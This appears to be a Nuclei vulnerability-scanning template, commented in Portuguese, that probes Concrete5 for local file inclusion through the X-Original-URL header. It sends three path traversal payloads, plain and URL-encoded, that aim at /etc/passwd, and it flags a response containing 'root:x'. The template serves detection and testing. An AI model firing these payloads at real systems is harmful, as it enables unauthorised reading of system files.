id: concrete5-lfi-type

info:
  name: Concrete5 LFI via X-Original-URL
  author: xandsz
  severity: medium
  description: |
    Detecta possíveis vulnerabilidades de Local File Inclusion no Concrete5 através do cabeçalho X-Original-URL.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-22
  metadata:
    max-request: 3
  tags: concrete5,lfi,x-original-url

http:
  # Primeira requisição com cabeçalhos manipulados
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
        X-Original-URL: /static/../../../../../../../../../../etc/passwd

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "root:x"
      - type: status
        status:
          - 200
          - 400
          - 500
          - 403

  # Segunda requisição
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
        X-Original-URL: /static/%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "root:x"
      - type: status
        status:
          - 200
          - 400
          - 500
          - 403

  # Terceira requisição
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
        X-Original-URL: %2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "root:x"
      - type: status
        status:
          - 200
          - 400
          - 500
          - 403